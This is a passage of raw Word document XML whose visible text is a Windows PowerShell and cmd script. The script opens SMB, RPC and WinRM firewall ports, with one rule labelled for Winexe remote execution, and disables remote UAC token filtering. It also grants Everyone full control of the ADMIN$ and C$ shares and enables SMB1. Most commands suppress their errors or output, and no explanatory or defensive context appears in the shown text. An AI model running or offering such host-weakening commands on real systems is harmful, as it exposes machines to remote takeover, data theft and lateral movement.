          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="699C68CD" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Set-Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LanmanServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StartupType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Automatic -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="306D6182" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ItemProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Path "HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters" -Name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AutoShareWks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Value 1 -Force -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="6F427451" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> firewall set rule group="File and Printer Sharing" new enable=Yes &gt; $null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="63753B30" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        New-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NetFirewallRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -DisplayName "Allow SMB </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>" -Direction Inbound -Protocol TCP -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LocalPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 135,139,445 -Action Allow -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="236C92B5" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        New-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NetFirewallRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -DisplayName "Allow </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>" -Direction Inbound -Protocol TCP -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LocalPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5985,5986 -Action Allow -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ErrorAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="1744DD4F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Remote Management Users" $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>env:UserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /add &gt; $null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="47EAD1FA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        reg add "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" /v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LocalAccountTokenFilterPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /t REG_DWORD /d 1 /f &gt; $null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="16863917" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        sc.exe config </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lanmanserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> start= auto &gt; $null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="3648F5F5" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        net share ADMIN$ /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grant:everyone</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,full</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; $null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="2810803D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        net share C$ /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>grant:everyone</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,full</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; $null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="1C145B89" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Enable-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WindowsOptionalFeature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Online -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FeatureName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB1Protocol -</w:t>
      </w:r>
